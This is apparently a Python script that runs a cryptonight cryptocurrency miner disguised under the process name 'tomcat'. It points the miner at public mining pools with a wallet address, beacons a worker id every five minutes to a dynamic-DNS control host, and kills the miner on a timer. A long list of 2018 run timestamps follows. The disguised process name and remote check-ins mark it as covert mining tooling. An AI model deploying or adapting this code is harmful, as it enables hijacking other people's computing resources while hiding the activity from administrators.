import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:05.871178
#2018-02-17 16:15:07.123479
#2018-02-17 18:04:05.261227
#2018-02-17 19:51:06.327439
#2018-02-17 21:38:04.154155
#2018-02-17 23:22:05.037009
#2018-02-18 01:11:05.620164
#2018-02-18 02:58:07.381137
#2018-02-18 04:48:01.987528
#2018-02-18 06:38:04.957188
#2018-02-18 08:27:05.038060
#2018-02-18 10:14:04.811592
#2018-02-18 12:00:04.110781
#2018-02-18 13:44:06.210825
#2018-02-18 15:36:07.477288
#2018-02-18 17:24:05.497476
#2018-02-18 19:12:06.702759
#2018-02-18 20:58:03.466688
#2018-02-18 22:43:05.847345
#2018-02-19 00:32:06.395544
#2018-02-19 02:17:06.377984
#2018-02-19 04:06:06.859427
#2018-02-19 05:50:06.298637
#2018-02-19 07:39:07.479323
#2018-02-19 09:29:05.284571
#2018-02-19 11:18:08.558256
#2018-02-19 13:05:07.478610
#2018-02-19 14:53:06.240882
#2018-02-19 16:40:07.968793
#2018-02-19 18:27:09.510086
#2018-02-19 20:13:06.731899
#2018-02-19 22:04:02.176862
#2018-02-19 23:51:07.760580
#2018-02-20 01:38:06.632487
#2018-02-20 03:26:05.485747
#2018-02-20 05:13:05.237908
#2018-02-20 06:57:07.449277
#2018-02-20 08:44:04.951916
#2018-02-20 10:28:01.961146
#2018-02-20 12:13:06.906964
#2018-02-20 14:00:08.808663
#2018-02-20 15:45:04.037093
#2018-02-20 17:33:09.866326
#2018-02-20 19:21:05.886494
#2018-02-20 21:10:10.396144
#2018-02-20 22:55:06.962519
#2018-02-21 00:37:04.467212
#2018-02-21 02:23:07.818504
#2018-02-21 04:11:05.625106
#2018-02-21 05:59:04.020233
#2018-02-21 07:47:02.148409
#2018-02-21 09:33:06.862512
#2018-02-21 11:21:04.257390
#2018-02-21 13:11:07.221152
#2018-02-21 14:57:04.893990
#2018-02-21 16:47:06.583117
#2018-02-21 18:36:01.900840
#2018-02-21 20:20:08.277421
#2018-02-21 22:08:07.946090
#2018-02-21 23:56:04.341836
#2018-02-22 01:44:06.051078
#2018-02-22 03:31:07.301016
#2018-02-22 05:19:07.207585
#2018-02-22 07:04:08.481726
#2018-02-22 08:51:02.059581
#2018-02-22 10:39:03.778005
#2018-02-22 12:25:12.514997
#2018-02-22 14:10:04.565474
#2018-02-22 15:56:05.904257
#2018-02-22 17:44:05.169218
#2018-02-22 19:31:06.296849
#2018-02-22 21:23:09.199011
#2018-02-22 23:08:04.689473
#2018-02-23 00:55:01.276455
#2018-02-23 02:42:04.152846
#2018-02-23 04:30:04.299343
#2018-02-23 06:15:01.704952
#2018-02-23 08:02:02.128222
#2018-02-23 10:16:03.875097
#2018-02-23 12:12:04.581549
#2018-02-23 14:00:09.334511
#2018-02-23 15:52:04.321635
#2018-02-23 17:37:01.636177
#2018-02-23 19:23:01.455625
#2018-02-23 21:06:07.053384
#2018-02-23 22:52:04.071339
#2018-02-24 00:39:06.679501
#2018-02-24 02:29:05.283982
#2018-02-24 04:21:06.006975
#2018-02-24 06:08:06.605396
#2018-02-24 07:56:05.387720
#2018-02-24 09:41:07.072981
#2018-02-24 11:36:06.649268
#2018-02-24 13:26:04.421907
#2018-02-24 15:15:03.204387
#2018-02-24 17:04:06.079224
#2018-02-24 18:57:04.206701
#2018-02-24 20:43:05.824090
#2018-02-24 22:57:05.125903
#2018-02-25 02:13:08.149676
#2018-02-25 05:47:01.392516
#2018-02-25 11:37:02.404976